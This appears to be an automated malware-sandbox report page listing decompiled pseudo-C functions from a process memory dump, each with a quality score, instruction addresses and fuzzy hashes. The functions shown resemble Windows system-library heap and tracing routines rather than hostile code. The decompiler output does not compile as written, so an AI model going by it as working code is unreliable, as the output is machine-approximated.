
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 60%

E010E1DB5(intOrPtr __ecx, intOrPtr* __edx, intOrPtr* _a4) { char _v8; intOrPtr _v12; intOrPtr _v16; intOrPtr* _v20; void* _t22; char _t23; void* _t36; intOrPtr _t42; intOrPtr _t43; _v12 = __ecx; _t43 = 0; _v20 = __edx; _t42 = *__edx; *__edx = 0; _v16 = _t42; _push( &_v8); _push(0); _push(0); _push(6); _push(0); _push(__ecx); _t36 = ((0 | __ecx != *((intOrPtr*)( *[fs:0x30] + 8))) - 0x00000001 & 0xc0000000) + 0x40000002; _push(_t36); _t22 = E010DF460(); if(_t22 < 0) { if(_t22 == 0xc0000023) { goto L1; } L3: return _t43; } L1: _t23 = _v8; if(_t23 != 0) { _t38 = _a4; if(_t23 > *_a4) { _t42 = L010D4620(_t38, *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t23); if(_t42 == 0) { goto L3; } _t23 = _v8; } _push( &_v8); _push(_t23); _push(_t42); _push(6); _push(_t43); _push(_v12); _push(_t36); if(E010DF460() < 0) { if(_t42 != 0 && _t42 != _v16) { L010D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t43, _t42); } goto L3; } *_v20 = _t42; *_a4 = _v8; } _t43 = 1; goto L3; } 0x010e1dc2 0x010e1dc5 0x010e1dc7 0x010e1dcc 0x010e1dce 0x010e1dd6 0x010e1ddf 0x010e1de0 0x010e1de1 0x010e1de5 0x010e1de8 0x010e1def 0x010e1df0 0x010e1df6 0x010e1df7 0x010e1dfe 0x010e1e1a 0x00000000 0x00000000 0x010e1e0b 0x010e1e12 0x010e1e12 0x010e1e00 0x010e1e00 0x010e1e05 0x010e1e1e 0x010e1e23 0x0112570f 0x01125713 0x00000000 0x00000000 0x01125719 0x01125719 0x010e1e2c 0x010e1e2d 0x010e1e2e 0x010e1e2f 0x010e1e31 0x010e1e32 0x010e1e35 0x010e1e3d 0x01125723 0x0112573d 0x0112573d 0x00000000 0x01125723 0x010e1e49 0x010e1e4e 0x010e1e4e 0x010e1e09 0x00000000

Memory Dump Source

Source File: 00000007.00000002.431895003.0000000001090000.00000040.00000001.sdmp, Offset: 01090000, based on PE: true

Associated: 00000007.00000002.432566539.00000000011AB000.00000040.00000001.sdmp Download File Associated: 00000007.00000002.432597012.00000000011AF000.00000040.00000001.sdmp Download File

Similarity

API ID: String ID: API String ID: Opcode ID: 113d149f2ee32d0cf172cc5618c6b00e5ec00d0f660e83749918783638c296a2 Instruction ID: 57366acaa606fd861147dea103d5a69675e93b9978f2df13b35c857feb9a7017 Opcode Fuzzy Hash: 113d149f2ee32d0cf172cc5618c6b00e5ec00d0f660e83749918783638c296a2 Instruction Fuzzy Hash: BD216D72600219EFD721CF9AC884EAABBF9EF89740F154095FA4597350D674AE11C7A0

Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 53%

E010D0050(void* __ecx) { signed int _v8; void* __ebx; void* __edi; void* __esi; void* __ebp; intOrPtr* _t30; intOrPtr* _t31; signed int _t34; void* _t40; void* _t41; signed int _t44; intOrPtr _t47; signed int _t58; void* _t59; void* _t61; void* _t62; signed int _t64; _push(__ecx); _v8 = *0x11ad360 ^ _t64; _t61 = __ecx; _t2 = _t61 + 0x20; // 0x20 E010E9ED0(_t2, 1, 0); _t52 = *(_t61 + 0x8c); _t4 = _t61 + 0x8c; // 0x8c _t40 = _t4; do { _t44 = _t52; _t58 = _t52 & 0x00000001; _t24 = _t44; asm("lock cmpxchg [ebx], edx"); _t52 = _t44; } while (_t52 != _t44); if(_t58 == 0) { L7: _pop(_t59); _pop(_t62); _pop(_t41); return E010FB640(_t24, _t41, _v8 ^ _t64, _t52, _t59, _t62); } asm("lock xadd [esi], eax"); _t47 = *[fs:0x18]; *((intOrPtr*)(_t61 + 0x50)) = *((intOrPtr*)(_t47 + 0x19c)); *((intOrPtr*)(_t61 + 0x54)) = *((intOrPtr*)(_t47 + 0x1a0)); _t30 = *((intOrPtr*)( *[fs:0x30] + 0x50)); if(_t30 != 0) { if( *_t30 == 0) { goto L4; } _t31 = *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c; L5: if( *_t31 != 0) { _t18 = _t61 + 0x78; // 0x78 E01188A62( *(_t61 + 0x5c), _t18, *((intOrPtr*)(_t61 + 0x30)), *((intOrPtr*)(_t61 + 0x34)), *((intOrPtr*)(_t61 + 0x3c))); } _t52 = *(_t61 + 0x5c); _t11 = _t61 + 0x78; // 0x78 _t34 = E010E9702(_t40, _t11, *(_t61 + 0x5c), *((intOrPtr*)(_t61 + 0x74)), 0); _t24 = _t34 | 0xffffffff; asm("lock xadd [esi], eax"); if((_t34 | 0xffffffff) == 0) { *0x11ab1e0(_t61); _t24 = *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t61 + 4))))))(); } goto L7; } L4: _t31 = 0x7ffe0386; goto L5; } 0x010d0055 0x010d005d 0x010d0062 0x010d006c 0x010d006f 0x010d0074 0x010d007a 0x010d007a 0x010d0080 0x010d0080 0x010d0087 0x010d008d 0x010d008f 0x010d0093 0x010d0095 0x010d009b 0x010d00f8 0x010d00fb 0x010d00fc 0x010d00ff 0x010d0108 0x010d0108 0x010d00a2 0x010d00a6 0x010d00b3 0x010d00bc 0x010d00c5 0x010d00ca 0x0111c01e 0x00000000 0x00000000 0x0111c02d 0x010d00d5 0x010d00d9 0x0111c03d 0x0111c046 0x0111c046 0x010d00df 0x010d00e2 0x010d00ea 0x010d00ef 0x010d00f2 0x010d00f6 0x010d0111 0x010d0117 0x010d0117 0x00000000 0x010d00f6 0x010d00d0 0x010d00d0 0x00000000

Memory Dump Source

Source File: 00000007.00000002.431895003.0000000001090000.00000040.00000001.sdmp, Offset: 01090000, based on PE: true

Associated: 00000007.00000002.432566539.00000000011AB000.00000040.00000001.sdmp Download File Associated: 00000007.00000002.432597012.00000000011AF000.00000040.00000001.sdmp Download File

Similarity

API ID: String ID: API String ID: Opcode ID: 583be761f75afac3196713b7e73467e02cbdd219f5962318825d8fdeabf08321 Instruction ID: c2a37c54f8b47b08dbfa5007cd2bdd2335979244b71471b045a978d4bff75ad8 Opcode Fuzzy Hash: 583be761f75afac3196713b7e73467e02cbdd219f5962318825d8fdeabf08321 Instruction Fuzzy Hash: C731CE31201B04DFD726CF28C844B9ABBE5FF88714F1485ADF59A87B94EB75A801CB90

Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 77%

E01136C0A(signed short* __ecx, signed char __edx, signed char _a4, signed char _a8) { signed short* _v8; signed char _v12; void* _t22; signed char* _t23; intOrPtr _t24; signed short* _t44; void* _t47; signed char* _t56; signed char* _t58; _t48 = __ecx; _push(__ecx); _push(__ecx); _t44 = __ecx; _v12 = __edx; _v8 = __ecx; _t22 = E010D7D50(); _t58 = 0x7ffe0384; if(_t22 == 0) { _t23 = 0x7ffe0384; } else { _t23 = *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a; } if( *_t23 != 0) { _t24 = *0x11a7b9c; // 0x0 _t47 = ( *_t44 & 0x0000ffff) + 0x30; _t23 = L010D4620(_t48, *((intOrPtr*)( *[fs:0x30] + 0x18)), _t24 + 0x180000, _t47); _t56 = _t23; if(_t56 != 0) { _t56[0x24] = _a4; _t56[0x28] = _a8; _t56[6] = 0x1420; _t56[0x20] = _v12; _t14 = &(_t56[0x2c]); // 0x2c E010FF3E0(_t14, _v8[2], *_v8 & 0x0000ffff); _t56[0x2c + (( *_v8 & 0x0000ffff) >> 1) * 2] = 0; if(E010D7D50() != 0) { _t58 = *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a; } _push(_t56); _push(_t47 - 0x20); _push(0x402); _push( *_t58 & 0x000000ff); E010F9AE0(); _t23 = L010D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t56); } } return _t23; } 0x01136c0a 0x01136c0f 0x01136c10 0x01136c13 0x01136c15 0x01136c19 0x01136c1c 0x01136c21 0x01136c28 0x01136c3a 0x01136c2a 0x01136c33 0x01136c33 0x01136c3f 0x01136c48 0x01136c4d 0x01136c60 0x01136c65 0x01136c69 0x01136c73 0x01136c79 0x01136c7f 0x01136c86 0x01136c90 0x01136c94 0x01136ca6 0x01136cb2 0x01136cbd 0x01136cbd 0x01136cc3 0x01136cc7 0x01136ccb 0x01136cd0 0x01136cd1 0x01136ce2 0x01136ce2 0x01136c69 0x01136ced

Memory Dump Source

Source File: 00000007.00000002.431895003.0000000001090000.00000040.00000001.sdmp, Offset: 01090000, based on PE: true

Associated: 00000007.00000002.432566539.00000000011AB000.00000040.00000001.sdmp Download File Associated: 00000007.00000002.432597012.00000000011AF000.00000040.00000001.sdmp Download File

Similarity

API ID: String ID: API String ID: Opcode ID: 6463785b85315868c5951abb28619f75e2112ed66bbd485bc002c2bf22cd9230 Instruction ID: fba9aedc7b73b2611a518dba2a79a4694096a0a0a6aed31455940a0d18d88bc8 Opcode Fuzzy Hash: 6463785b85315868c5951abb28619f75e2112ed66bbd485bc002c2bf22cd9230 Instruction Fuzzy Hash: E1219AB2A00645BBD715DB68D880F6AB7B8FF48704F140069F948C7B90D734EE10CBA4

Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 82%

E010F90AF(intOrPtr __ecx, void* __edx, intOrPtr* _a4) { intOrPtr* _v0; void* _v8; signed int _v12; intOrPtr _v16; char _v36; void* _t38; intOrPtr _t41; void* _t44; signed int _t45; intOrPtr* _t49; signed int _t57; signed int _t58; intOrPtr* _t59; void* _t62; void* _t63; void* _t65; void* _t66; signed int _t69; intOrPtr* _t70; void* _t71; intOrPtr* _t72; intOrPtr* _t73; char _t74; _t65 = __edx; _t57 = _a4; _t32 = __ecx; _v8 = __edx; _t3 = _t32 + 0x14c; // 0x14c _t70 = _t3; _v16 = __ecx; _t72 = *_t70; while(_t72 != _t70) { if( *((intOrPtr*)(_t72 + 0xc)) != _t57) { L24: _t72 = *_t72; continue; } _t30 = _t72 + 0x10; // 0x10 if(E0110D4F0(_t30, _t65, _t57) == _t57) { return 0xb7; } _t65 = _v8; goto L24; } _t61 = _t57; _push( &_v12); _t66 = 0x10; if(E010EE5E0(_t57, _t66) < 0) { return 0x216; } _t73 = L010D4620(_t61, *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v12); if(_t73 == 0) { _t38 = 0xe; return _t38; } _t9 = _t73 + 0x10; // 0x10 *((intOrPtr*)(_t73 + 0xc)) = _t57; E010FF3E0(_t9, _v8, _t57); _t41 = *_t70; if( *((intOrPtr*)(_t41 + 4)) != _t70) { _t62 = 3; asm("int 0x29"); _push(_t62); _push(_t57); _push(_t73); _push(_t70); _t71 = _t62; _t74 = 0; _v36 = 0; _t63 = E010EA2F0(_t62, _t71, 1, 6, &_v36); if(_t63 == 0) { L20: _t44 = 0x57; return _t44; } _t45 = _v12; _t58 = 0x1c; if(_t45 < _t58) { goto L20; } _t69 = _t45 / _t58; if(_t69 == 0) { L19: return 0xe8; } _t59 = _v0; do { if( *((intOrPtr*)(_t63 + 0xc)) != 2) { goto L18; } _t49 = *((intOrPtr*)(_t63 + 0x14)) + _t71; *_t59 = _t49; if( *_t49 != 0x53445352) { goto L18; } *_a4 = *((intOrPtr*)(_t63 + 0x10)); return 0; L18: _t63 = _t63 + 0x1c; _t74 = _t74 + 1; } while (_t74 < _t69); goto L19; } *_t73 = _t41; *((intOrPtr*)(_t73 + 4)) = _t70; *((intOrPtr*)(_t41 + 4)) = _t73; *_t70 = _t73; *(_v16 + 0xdc) = *(_v16 + 0xdc) | 0x00000010; return 0; } 0x010f90af 0x010f90b8 0x010f90bb 0x010f90bf 0x010f90c2 0x010f90c2 0x010f90c8 0x010f90cb 0x010f90cd 0x011314d7 0x011314eb 0x011314eb 0x00000000 0x011314eb 0x011314db 0x011314e6 0x00000000 0x011314f2 0x011314e8 0x00000000 0x011314e8 0x010f90d8 0x010f90da 0x010f90dd 0x010f90e5 0x00000000 0x010f9139 0x010f90fa 0x010f90fe 0x010f9142 0x00000000 0x010f9142 0x010f9104 0x010f9107 0x010f910b 0x010f9110 0x010f9118 0x010f9147 0x010f9148 0x010f914f 0x010f9150 0x010f9151 0x010f9152 0x010f9156 0x010f915d 0x010f9160 0x010f9168 0x010f916c 0x010f91bc 0x010f91be 0x00000000 0x010f91be 0x010f916e 0x010f9173 0x010f9176 0x00000000 0x00000000 0x010f917c 0x010f9180 0x010f91b5 0x00000000 0x010f91b5 0x010f9182 0x010f9185 0x010f9189 0x00000000 0x00000000 0x010f918e 0x010f9190 0x010f9198 0x00000000 0x00000000 0x010f91a0 0x00000000 0x010f91ad 0x010f91ad 0x010f91b0 0x010f91b1 0x00000000 0x010f9185 0x010f911a 0x010f911c 0x010f911f 0x010f9125 0x010f9127 0x00000000

Memory Dump Source

Source File: 00000007.00000002.431895003.0000000001090000.00000040.00000001.sdmp, Offset: 01090000, based on PE: true

Associated: 00000007.00000002.432566539.00000000011AB000.00000040.00000001.sdmp Download File Associated: 00000007.00000002.432597012.00000000011AF000.00000040.00000001.sdmp Download File

Similarity

API ID: String ID: API String ID: Opcode ID: 6bfd702525c1db8ef159ef8001ebf0bb6a8fccc454e16ed8d2a19b71faa45fc1 Instruction ID: 84537a1d460293eafe11aef0c693f20494bb3904bc8fc3a1c6cdfac6fd99cb33 Opcode Fuzzy Hash: 6bfd702525c1db8ef159ef8001ebf0bb6a8fccc454e16ed8d2a19b71faa45fc1 Instruction Fuzzy Hash: B5217C71A00205EFDB21DF59C845EAAFBF8EB54314F14887EFA89A7611D370A9048B90

Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 59%

E010E3B7A(void* __ecx) { signed int _v8; char _v12; intOrPtr _v20; intOrPtr _t17; intOrPtr _t26; void* _t35; void* _t38; void* _t41; intOrPtr _t44; _t17 = *0x11a84c4; // 0x0 _v12 = 1; _v8 = *0x11a84c0 * 0x4c; _t41 = __ecx; _t35 = L010D4620(__ecx, *((intOrPtr*)( *[fs:0x30] + 0x18)), _t17 + 0x000c0000 | 0x00000008, *0x11a84c0 * 0x4c); if(_t35 == 0) { _t44 = 0xc0000017; } else { _push( &_v8); _push(_v8); _push(_t35); _push(4); _push( &_v12); _push(0x6b); _t44 = E010FAA90(); _v20 = _t44; if(_t44 >= 0) { E010FFA60( *((intOrPtr*)(_t41 + 0x20)), 0, *0x11a84c0 * 0xc); _t38 = _t35; if(_t35 < _v8 + _t35) { do { asm("movsd"); asm("movsd"); asm("movsd"); _t38 = _t38 + *((intOrPtr*)(_t38 + 4)); } while (_t38 < _v8 + _t35); _t44 = _v20; } } _t26 = *0x11a84c4; // 0x0 L010D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t26 + 0xc0000, _t35); } return _t44; } 0x010e3b89 0x010e3b96 0x010e3ba1 0x010e3bab 0x010e3bb5 0x010e3bb9 0x01126298 0x010e3bbf 0x010e3bc2 0x010e3bc3 0x010e3bc9 0x010e3bca 0x010e3bcc 0x010e3bcd 0x010e3bd4 0x010e3bd6 0x010e3bdb 0x010e3bea 0x010e3bf7 0x010e3bfb 0x010e3bff 0x010e3c09 0x010e3c0a 0x010e3c0b 0x010e3c0f 0x010e3c14 0x010e3c18 0x010e3c18 0x010e3bfb 0x010e3c1b 0x010e3c30 0x010e3c30 0x010e3c3d

Memory Dump Source

Source File: 00000007.00000002.431895003.0000000001090000.00000040.00000001.sdmp, Offset: 01090000, based on PE: true

Associated: 00000007.00000002.432566539.00000000011AB000.00000040.00000001.sdmp Download File Associated: 00000007.00000002.432597012.00000000011AF000.00000040.00000001.sdmp Download File

Similarity

API ID: String ID: API String ID: Opcode ID: 33fb56a2fbe85f9b384ffab210be28408a4619c0b029d99b1bcbd98a6d8d6829 Instruction ID: 29cecc1e7216014da33f04adac3016eaf7e0595a4e993e4db0153bd1664d525e Opcode Fuzzy Hash: 33fb56a2fbe85f9b384ffab210be28408a4619c0b029d99b1bcbd98a6d8d6829 Instruction Fuzzy Hash: 7B219FB2A00109AFC714DF58CD81BAABBBDFB44748F250068EA09AB251D371ED55CB90

Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 80%

E01136CF0(void* __edx, intOrPtr _a4, short _a8) { char _v8; char _v12; char _v16; char _v20; char _v28; char _v36; char _v52; void* __ebx; void* __edi; void* __esi; void* __ebp; signed char* _t21; void* _t24; void* _t36; void* _t38; void* _t46; _push(_t36); _t46 = __edx; _v12 = 0; _v8 = 0; _v20 = 0; _v16 = 0; if(E010D7D50() == 0) { _t21 = 0x7ffe0384; } else { _t21 = ( *[fs:0x30])[0x50] + 0x22a; } if( *_t21 != 0) { _t21 = *[fs:0x30]; if((_t21[0x240] & 0x00000004) != 0) { if(E010D7D50() == 0) { _t21 = 0x7ffe0385; } else { _t21 = ( *[fs:0x30])[0x50] + 0x22b; } if(( *_t21 & 0x00000020) != 0) { _t56 = _t46; if(_t46 == 0) { _t46 = 0x1095c80; } _push(_t46); _push( &_v12); _t24 = E010EF6E0(_t36, 0, _t46, _t56); _push(_a4); _t38 = _t24; _push( &_v28); _t21 = E010EF6E0(_t38, 0, _t46, _t56); if(_t38 != 0) { if(_t21 != 0) { E01137016(_a8, 0, 0, 0, &_v36, &_v28); L010D2400( &_v52); } _t21 = L010D2400( &_v28); } } } } return _t21; } 0x01136cfb 0x01136d00 0x01136d02 0x01136d06 0x01136d0a 0x01136d0e 0x01136d19 0x01136d2b 0x01136d1b 0x01136d24 0x01136d24 0x01136d33 0x01136d39 0x01136d46 0x01136d4f 0x01136d61 0x01136d51 0x01136d5a 0x01136d5a 0x01136d69 0x01136d6b 0x01136d6d 0x01136d6f 0x01136d6f 0x01136d74 0x01136d79 0x01136d7a 0x01136d7f 0x01136d82 0x01136d88 0x01136d89 0x01136d90 0x01136d94 0x01136da7 0x01136db1 0x01136db1 0x01136dbb 0x01136dbb 0x01136d90 0x01136d69 0x01136d46 0x01136dc6

Memory Dump Source

Source File: 00000007.00000002.431895003.0000000001090000.00000040.00000001.sdmp, Offset: 01090000, based on PE: true

Associated: 00000007.00000002.432566539.00000000011AB000.00000040.00000001.sdmp Download File Associated: 00000007.00000002.432597012.00000000011AF000.00000040.00000001.sdmp Download File

Similarity

API ID: String ID: API String ID: Opcode ID: 0f2e19d5ba10ad4a0f450c2ed6110eb3f74a2c2c41bb57a534abf184889bbf04 Instruction ID: 4691b8c5faacd565a5c2abae760953b65fb60d3ffd553e0e624936aacd311f16 Opcode Fuzzy Hash: 0f2e19d5ba10ad4a0f450c2ed6110eb3f74a2c2c41bb57a534abf184889bbf04 Instruction Fuzzy Hash: 7A21F272500346AFDB15EF29D948BABBBECAFD1650F040556FAC0C7255EB34CA48C6A2

Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 67%

E0118070D(signed int* __ecx, signed int __edx, void* __eflags, signed int _a4, signed int _a8) { char _v8; intOrPtr _v11; signed int _v12; intOrPtr _v15; signed int _v16; intOrPtr _v28; void* __ebx; char* _t32; signed int* _t38; signed int _t60; _t38 = __ecx; _v16 = __edx; _t60 = E011807DF(__ecx, __edx, &_a4, &_a8, 2); if(_t60 != 0) { _t7 = _t38 + 0x38; // 0x29cd5903 _push( *_t7); _t9 = _t38 + 0x34; // 0x6adeeb00 _push( *_t9); _v12 = _a8 << 0xc; _t11 = _t38 + 4; // 0x5de58b5b _push(0x4000); _v8 = (_a4 << 0xc) + (_v16 - ( *__ecx & _v16) >> 4 << *_t11) + ( *__ecx & _v16); E0117AFDE( &_v8, &_v12); E01181293(_t38, _v28, _t60); if(E010D7D50() == 0) { _t32 = 0x7ffe0380; } else { _t32 = *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226; } if( *_t32 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) { _t21 = _t38 + 0x3c; // 0xc3595e5f E011714FB(_t38, *_t21, _v11, _v15, 0xd); } } return ~_t60; } 0x0118071b 0x01180724 0x01180734 0x01180738 0x0118074b 0x0118074b 0x01180753 0x01180753 0x01180759 0x0118075d 0x01180774 0x01180779 0x0118077d 0x01180789 0x01180795 0x011807a7 0x01180797 0x011807a0 0x011807a0 0x011807af 0x011807c4 0x011807cd 0x011807cd 0x011807af 0x011807dc

Memory Dump Source

Source File: 00000007.00000002.431895003.0000000001090000.00000040.00000001.sdmp, Offset: 01090000, based on PE: true

Associated: 00000007.00000002.432566539.00000000011AB000.00000040.00000001.sdmp Download File Associated: 00000007.00000002.432597012.00000000011AF000.00000040.00000001.sdmp Download File

Similarity

API ID: String ID: API String ID: Opcode ID: 16b9495bd7cfc8dc207f06a58ad33f13931981def28ffdf8d69df6cf9eebd83e Instruction ID: ac62188f6b19befc91673a7e3293873bdba35f2cc0eed7d0ea8fc58ed96d2067 Opcode Fuzzy Hash: 16b9495bd7cfc8dc207f06a58ad33f13931981def28ffdf8d69df6cf9eebd83e Instruction Fuzzy Hash: 9F213436204604AFD709EF28C880B6ABBA6EFD4350F04C529FD958B385C730D909CB92

Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 82%

E01137794(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, unsigned int _a8, void* _a12) { intOrPtr _v8; intOrPtr _v12; intOrPtr _t21; void* _t24; intOrPtr _t25; void* _t36; short _t39; signed char* _t42; unsigned int _t46; void* _t50; _push(__ecx); _push(__ecx); _t21 = *0x11a7b9c; // 0x0 _t46 = _a8; _v12 = __edx; _v8 = __ecx; _t4 = _t46 + 0x2e; // 0x2e _t36 = _t4; _t24 = L010D4620(__ecx, *((intOrPtr*)( *[fs:0x30] + 0x18)), _t21 + 0x180000, _t36); _t50 = _t24; if(_t50 != 0) { _t25 = _a4; if(_t25 == 5) { L3: _t39 = 0x14b1; } else { _t39 = 0x14b0; if(_t25 == 6) { goto L3; } } *((short*)(_t50 + 6)) = _t39; *((intOrPtr*)(_t50 + 0x28)) = _t25; _t11 = _t50 + 0x2c; // 0x2c *((intOrPtr*)(_t50 + 0x20)) = _v8; *((intOrPtr*)(_t50 + 0x24)) = _v12; E010FF3E0(_t11, _a12, _t46); *((short*)(_t50 + 0x2c + (_t46 >> 1) * 2)) = 0; if(E010D7D50() == 0) { _t42 = 0x7ffe0384; } else { _t42 = *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a; } _push(_t50); _t19 = _t36 - 0x20; // 0xe _push(0x403); _push( *_t42 & 0x000000ff); E010F9AE0(); _t24 = L010D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t50); } return _t24; } 0x01137799 0x0113779a 0x0113779b 0x011377a3 0x011377ab 0x011377ae 0x011377b1 0x011377b1 0x011377bf 0x011377c4 0x011377c8 0x011377ce 0x011377d4 0x011377e0 0x011377e0 0x011377d6 0x011377d6 0x011377de 0x00000000 0x00000000 0x011377de 0x011377e5 0x011377f0 0x011377f3 0x011377f6 0x011377fd 0x01137800 0x0113780c 0x01137818 0x0113782b 0x0113781a 0x01137823 0x01137823 0x01137830 0x01137831 0x01137838 0x0113783d 0x0113783e 0x0113784f 0x0113784f 0x0113785a

Memory Dump Source

Source File: 00000007.00000002.431895003.0000000001090000.00000040.00000001.sdmp, Offset: 01090000, based on PE: true

Associated: 00000007.00000002.432566539.00000000011AB000.00000040.00000001.sdmp Download File Associated: 00000007.00000002.432597012.00000000011AF000.00000040.00000001.sdmp Download File

Similarity

API ID: String ID: API String ID: Opcode ID: f246c48e8c846aad5e79e8f5e1d7bc93d24758be7cb0a91807700eafc9cbd6b4 Instruction ID: f9d4e78e46b060e36cfa156c11e6e789d70e426828d3bf5803c30079a2e59645 Opcode Fuzzy Hash: f246c48e8c846aad5e79e8f5e1d7bc93d24758be7cb0a91807700eafc9cbd6b4 Instruction Fuzzy Hash: 4B2181B2500604ABC729DF69D894EABBBB9EF88740F10456DF64AD7B90D734E900CB94

Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 96%

E010DAE73(intOrPtr __ecx, void* __edx) { intOrPtr _v8; void* _t19; char* _t22; signed char* _t24; intOrPtr _t25; intOrPtr _t27; void* _t31; intOrPtr _t36; char* _t38; signed char* _t42; _push(__ecx); _t31 = __edx; _v8 = __ecx; _t19 = E010D7D50(); _t38 = 0x7ffe0384; if(_t19 != 0) { _t22 = *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a; } else { _t22 = 0x7ffe0384; } _t42 = 0x7ffe0385; if( *_t22 != 0) { if(E010D7D50() == 0) { _t24 = 0x7ffe0385; } else { _t24 = *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b; } if(( *_t24 & 0x00000010) != 0) { goto L17; } else { goto L3; } } else { L3: _t27 = E010D7D50(); if(_t27 != 0) { _t27 = *[fs:0x30]; _t38 = *((intOrPtr*)(_t27 + 0x50)) + 0x22a; } if( *_t38 != 0) { _t27 = *[fs:0x30]; if(( *(_t27 + 0x240) & 0x00000004) == 0) { goto L5; } _t27 = E010D7D50(); if(_t27 != 0) { _t27 = *[fs:0x30]; _t42 = *((intOrPtr*)(_t27 + 0x50)) + 0x22b; } if(( *_t42 & 0x00000020) != 0) { L17: _t25 = _v8; _t36 = 0; if(_t25 != 0) { _t36 = *((intOrPtr*)(_t25 + 0x18)); } _t27 = E01137794( *((intOrPtr*)(_t31 + 0x18)), _t36, *((intOrPtr*)(_t31 + 0x94)), *(_t31 + 0x24) & 0x0000ffff, *((intOrPtr*)(_t31 + 0x28))); } goto L5; } else { L5: return _t27; } } } 0x010dae78 0x010dae7c 0x010dae7e 0x010dae81 0x010dae86 0x010dae8d 0x01122691 0x010dae93 0x010dae93 0x010dae93 0x010dae98 0x010dae9d 0x011226a2 0x011226b4 0x011226a4 0x011226ad 0x011226ad 0x011226b9 0x00000000 0x011226bb 0x00000000 0x011226bb 0x010daea3 0x010daea3 0x010daea3 0x010daeaa 0x011226c0 0x011226c9 0x011226c9 0x010daeb3 0x011226d4 0x011226e1 0x00000000 0x00000000 0x011226e7 0x011226ee 0x011226f0 0x011226f9 0x011226f9 0x01122702 0x01122708 0x01122708 0x0112270b 0x0112270f 0x01122711 0x01122711 0x01122725 0x01122725 0x00000000 0x010daeb9 0x010daeb9 0x010daebf 0x010daebf 0x010daeb3

Memory Dump Source

Source File: 00000007.00000002.431895003.0000000001090000.00000040.00000001.sdmp, Offset: 01090000, based on PE: true

Associated: 00000007.00000002.432566539.00000000011AB000.00000040.00000001.sdmp Download File Associated: 00000007.00000002.432597012.00000000011AF000.00000040.00000001.sdmp Download File

Similarity

API ID: String ID: API String ID: Opcode ID: 892ffc7d7f960dfab719e72e37e7183e7cc58ff0f898e4f283d94cb5f6144d78 Instruction ID: a8f2b535add04b8b2fed42e28b1d3a606db73cf6bbdfeda10a07039fae522e23 Opcode Fuzzy Hash: 892ffc7d7f960dfab719e72e37e7183e7cc58ff0f898e4f283d94cb5f6144d78 Instruction Fuzzy Hash: D921F072701791DFEB2A9B2CC948B697BE8EF45344F1900A0ED448B7A2E738DC50C7A0

Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 93%

E010EFD9B(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) { intOrPtr _v8; void* _t19; intOrPtr _t29; intOrPtr _t32; intOrPtr _t35; intOrPtr _t37; intOrPtr* _t40; _t35 = __edx; _push(__ecx); _push(__ecx); _t37 = 0; _v8 = __edx; _t29 = __ecx; if( *((intOrPtr*)( *[fs:0x18] + 0xfbc)) != 0) { _t40 = *((intOrPtr*)( *[fs:0x18] + 0xfbc)); L3: _t19 = _a4 - 4; if(_t19 != 0) { if(_t19 != 1) { L7: return _t37; } if(_t35 == 0) { L11: _t37 = 0xc000000d; goto L7; } if( *((intOrPtr*)(_t40 + 4)) != _t37) { L010D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t37, *((intOrPtr*)(_t40 + 4))); _t35 = _v8; } *((intOrPtr*)(_t40 + 4)) = _t35; goto L7; } if(_t29 == 0) { goto L11; } _t32 = *_t40; if(_t32 != 0) { *((intOrPtr*)(_t29 + 0x20)) = *((intOrPtr*)(_t32 + 0x20)); E010C76E2( *_t40); } *_t40 = _t29; goto L7; } _t40 = L010D4620(__ecx, *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 8); if(_t40 == 0) { _t37 = 0xc0000017; goto L7; } _t35 = _v8; *_t40 = 0; *((intOrPtr*)(_t40 + 4)) = 0; *((intOrPtr*)( *[fs:0x18] + 0xfbc)) = _t40; goto L3; } 0x010efd9b 0x010efda0 0x010efda1 0x010efdab 0x010efdad 0x010efdb0 0x010efdb8 0x010efe0f 0x010efde6 0x010efde9 0x010efdec 0x0112c0c0 0x010efdfe 0x010efe06 0x010efe06 0x0112c0c8 0x010efe2d 0x010efe2d 0x00000000 0x010efe2d 0x0112c0d1 0x0112c0e0 0x0112c0e5 0x0112c0e5 0x0112c0e8 0x00000000 0x0112c0e8 0x010efdf4 0x00000000 0x00000000 0x010efdf6 0x010efdfa 0x010efe1a 0x010efe1f 0x010efe1f 0x010efdfc 0x00000000 0x010efdfc 0x010efdcc 0x010efdd0 0x010efe26 0x00000000 0x010efe26 0x010efdd8 0x010efddb 0x010efddd 0x010efde0 0x00000000

Memory Dump Source

Source File: 00000007.00000002.431895003.0000000001090000.00000040.00000001.sdmp, Offset: 01090000, based on PE: true

Associated: 00000007.00000002.432566539.00000000011AB000.00000040.00000001.sdmp Download File Associated: 00000007.00000002.432597012.00000000011AF000.00000040.00000001.sdmp Download File

Similarity

